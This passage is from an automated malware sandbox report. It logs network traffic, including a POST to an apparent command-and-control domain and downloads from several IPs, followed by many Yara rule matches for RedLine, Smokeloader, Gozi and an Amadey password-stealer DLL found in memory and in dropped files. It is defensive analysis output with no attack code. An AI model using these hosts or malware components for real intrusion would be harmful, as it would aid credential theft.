ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Nov 2022 09:38:48 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Nov 2022 09:39:12 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytes
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://debvplifcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: o36fafs3sn6xou.com
Source: unknown HTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.206.73:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.96.151.53:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.216.243.155:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49806 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: tiddsjj, 0000000B.00000002.378644024.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040E054 0_2_0040E054
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040AD62 0_2_0040AD62
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040F105 0_2_0040F105
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040DB10 0_2_0040DB10
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040E054 11_2_0040E054
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040AD62 11_2_0040AD62
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040F105 11_2_0040F105
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040DB10 11_2_0040DB10
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B4130D 11_2_00B4130D
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00408C60 12_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040DC11 12_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00418CCC 12_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00406CA0 12_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004028B0 12_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0041A4BE 12_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00407D62 12_2_00407D62
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00418244 12_2_00418244
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00401650 12_2_00401650
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00402F20 12_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004193C4 12_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00418788 12_2_00418788
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00402F89 12_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00402B90 12_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004073A0 12_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_02526078 12_2_02526078
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_02526088 12_2_02526088
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: S2XJ2wbz7u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
